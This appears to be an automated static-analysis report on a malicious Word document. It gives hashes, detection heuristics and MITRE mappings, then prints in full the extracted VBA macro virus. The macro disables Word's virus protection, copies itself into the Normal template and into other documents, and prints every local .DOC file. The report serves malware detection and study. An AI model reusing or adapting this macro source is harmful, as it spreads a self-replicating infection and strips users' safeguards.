Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bbc8fdf8d62f5582…

MALICIOUS

Office (OLE)

55.5 KB Created: 1999-06-07 19:41:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1329516a07f54f98109621e90690156b SHA-1: b5b2f9e581368bea3eb21e3201b81847a1bef530 SHA-256: bbc8fdf8d62f5582ed56ac0407a252b2b63acb2ce77585b9952cb3b17eacabdc
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with a Document_Open subroutine, which is a common technique for executing malicious code upon opening a document. The script explicitly attempts to disable 'VirusProtection' and then proceeds to print all files with a .DOC extension in the local directory. This behavior suggests a destructive or disruptive intent, possibly framed as a contest entry as indicated by the document body text.

Heuristics 4

  • ClamAV: Doc.Trojan.Small-498 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Small-498
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://pegasus.cc.ucf.edu/~kes65601 In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1685 bytes
SHA-256: ba527b1ff5114cd5522ec05d35936c7cb7de5e2912ac794c1422b19f6e37e260
Detection
ClamAV: Doc.Trojan.Small-498
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()

' Disable Macro Protection
Options.VirusProtection = (1 + 2 - 3):

' Copy Active to Normal
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Find("Document_Open", 1, 10, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines, 30, True, False, False) = False Then
    ActiveDocument.VBProject.VBComponents.Item(1).Export ("SkamWerks")
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("SkamWerks")
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4
    Options.SaveNormalPrompt = (-2 + 2)
' Copy From Normal to Active
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Find("Document_Open", 1, 10, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines, 30, True, False, False) = False Then
    ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("SkamWerks")
    ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    'Payload - Print Out All Docs in Local Directory.
    myDoc = Dir("*.DOC"): While myDoc <> "": Application.PrintOut FileName:=myDoc: myDoc = Dir(): Wend
  
End If
End Sub

' SmallWorld Virii - By Skammy of SkamWerks! http://pegasus.cc.ucf.edu/~kes65601
' Written for the sole purpose of the Smallest Word Class Macro Virii Contest!
' Please do not distrubute!

Open this report in the interactive analyzer, or submit your own file for analysis.